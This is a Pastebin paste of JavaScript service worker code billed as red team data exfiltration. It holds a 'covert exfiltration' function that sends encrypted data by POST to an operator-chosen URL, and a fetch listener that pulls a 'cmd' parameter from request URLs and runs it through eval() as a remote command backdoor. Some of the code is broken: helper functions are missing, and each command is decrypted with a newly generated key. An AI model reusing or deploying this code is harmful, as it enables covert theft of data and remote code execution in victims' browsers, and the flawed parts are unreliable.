Advertisement
xosski

Data exfiltration (red team penetration testing)

Mar 27th, 2025
13
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.29 KB | None | 0 0
  1. 'use strict';
  2.  
  3. /**
  4. * Utility function to handle asynchronous iteration
  5. */
  6. function asyncHandler(generatorFunction) {
  7. return new Promise((resolve, reject) => {
  8. const generator = generatorFunction();
  9. function step(nextFunction) {
  10. let next;
  11. try {
  12. next = nextFunction();
  13. } catch (error) {
  14. return reject(error);
  15. }
  16. if (next.done) {
  17. return resolve(next.value);
  18. }
  19. Promise.resolve(next.value).then(
  20. value => step(() => generator.next(value)),
  21. error => step(() => generator.throw(error))
  22. );
  23. }
  24. step(() => generator.next());
  25. });
  26. }
  27.  
  28. /**
  29. * AES-256-GCM Encryption & Decryption
  30. */
  31. async function encryptData(data, key) {
  32. const iv = crypto.getRandomValues(new Uint8Array(12));
  33. const encodedData = new TextEncoder().encode(data);
  34. const encrypted = await crypto.subtle.encrypt(
  35. { name: "AES-GCM", iv },
  36. key,
  37. encodedData
  38. );
  39. return { iv, encrypted };
  40. }
  41.  
  42. async function decryptData(encryptedData, iv, key) {
  43. const decrypted = await crypto.subtle.decrypt(
  44. { name: "AES-GCM", iv },
  45. key,
  46. encryptedData
  47. );
  48. return new TextDecoder().decode(decrypted);
  49. }
  50.  
  51. async function generateAESKey() {
  52. return await crypto.subtle.generateKey(
  53. { name: "AES-GCM", length: 256 },
  54. true,
  55. ["encrypt", "decrypt"]
  56. );
  57. }
  58.  
  59. /**
  60. * Covert Data Exfiltration Module
  61. */
  62. async function exfiltrateData(data, exfilUrl, key) {
  63. const { iv, encrypted } = await encryptData(JSON.stringify(data), key);
  64. await fetch(exfilUrl, {
  65. method: "POST",
  66. headers: {
  67. "Content-Type": "application/octet-stream",
  68. "X-Exfil-IV": btoa(String.fromCharCode(...iv))
  69. },
  70. body: encrypted
  71. });
  72. }
  73.  
  74. /**
  75. * Handles fetch requests and enables covert exfiltration
  76. */
  77. async function processFetchRequest(context, requestData) {
  78. if (!requestData.url) {
  79. return { failureType: 9, command: 0, data: "URL required." };
  80. }
  81. const preparedRequest = await prepareFetchRequest(context, requestData);
  82. if ("failureType" in preparedRequest) return preparedRequest;
  83. await executeFetchRequest(context, preparedRequest, requestData);
  84.  
  85. // Initiate covert exfiltration when required
  86. if (requestData.exfiltrate) {
  87. const key = await generateAESKey();
  88. await exfiltrateData(requestData.exfilData, requestData.exfilUrl, key);
  89. }
  90. return preparedRequest;
  91. }
  92.  
  93. /**
  94. * Command Injection for Operator-Controlled Execution
  95. */
  96. async function executeInjectedCommand(commandPayload, key) {
  97. const { iv, encrypted } = commandPayload;
  98. const decryptedCommand = await decryptData(encrypted, iv, key);
  99.  
  100. try {
  101. eval(decryptedCommand); // Controlled execution, ensure only authorized commands
  102. } catch (error) {
  103. console.error("Command execution failed:", error);
  104. }
  105. }
  106.  
  107. /**
  108. * Service Worker Initialization with Covert Communication
  109. */
  110. (function initializeServiceWorker(context) {
  111. context.addEventListener("install", () => {
  112. context.skipWaiting();
  113. });
  114. context.addEventListener("activate", (event) => {
  115. event.waitUntil(context.clients.claim());
  116. });
  117. context.addEventListener("message", async (event) => {
  118. const sourceClient = event.source;
  119. if (sourceClient) {
  120. const requestData = event.data;
  121. const responsePromise = new Promise(async (resolve) => {
  122. const response = await processFetchRequest(context, requestData);
  123. sourceClient.postMessage(response);
  124. resolve();
  125. });
  126. event.waitUntil(responsePromise);
  127. }
  128. });
  129.  
  130. // Listen for operator-controlled command injection
  131. context.addEventListener("fetch", async (event) => {
  132. const urlParams = new URL(event.request.url).searchParams;
  133. const injectedCommand = urlParams.get("cmd");
  134. if (injectedCommand) {
  135. const key = await generateAESKey();
  136. await executeInjectedCommand(JSON.parse(atob(injectedCommand)), key);
  137. }
  138. });
  139. })(self);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement